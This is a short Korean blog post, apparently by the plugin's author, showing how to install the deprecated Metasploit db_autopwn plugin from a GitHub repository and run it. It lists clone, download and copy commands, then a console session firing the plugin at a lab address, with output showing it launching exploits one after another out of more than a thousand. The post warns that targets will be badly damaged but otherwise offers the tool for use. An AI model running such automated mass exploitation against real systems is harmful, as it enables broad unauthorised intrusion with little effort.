Automatic Exploit&Vulnerability Attack Using db_autopwn.rb

예전에 Metasploit에는 db_autopwn이라는 plugin이 있었습니다. 다수의 시스템을 테스트하고 공격을 수행해야하는 사람 입장에서 아주 유용할 수 있는 plugin이지만 문제가 있어 공식 버전에서 제외된 plugin이죠. 전설처럼 내려오는 db_autopwn 코드를 통해 따로 plugin으로 넣어준다면 지금도 충분히 사용 가능합니다.

다만 이로인해 Metasploit의 동작에 문제가 생길 수 있고 대상 시스템은 당연히 큰 타격을 입게되니 재미로만 보시는게 좋을 것 같습니다. db_autopwn.rb 코드는 구글링을 통해 찾으시거나 제 git에서 긁어서 사욯하시면 됩니다.

  • https://github.com/hahwul/metasploit-db_autopwn

    Install

    코드만 있다면 일반적인 metasploit plugin 설치와 동일합니다.

git clone https://github.com/hahwul/metasploit-db_autopwn

또는

wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb

하여 db_autopwn.rb 파일을 받아줍니다. 이 파일을 metasploit의 plugin 디렉토리에 넣어줍니다.

cd metasploit-db_autopwn
cp db_autopwn.rb [your_metasploit_dir]/plugin

끝!

Usage

msfconsole
HAHWUL > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
HAHWUL > db_autopwn -p -R great -e -q 192.168.56.101
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] (1/1301 [0 sessions]): Launching exploit/bsdi/softcart/mercantec_softcart against 192.168.56.44:80...
[*] (2/1301 [0 sessions]): Launching exploit/freebsd/http/watchguard_cmd_exec against 192.168.56.44:80...
[*] (3/1301 [0 sessions]): Launching exploit/linux/antivirus/escan_password_exec against 192.168.56.44:80...
[*] (4/1301 [0 sessions]): Launching exploit/linux/http/accellion_fta_getstatus_oauth against 192.168.56.44:80...
[*] (5/1301 [0 sessions]): Launching exploit/linux/http/advantech_switch_bash_env_exec against 192.168.56.44:80...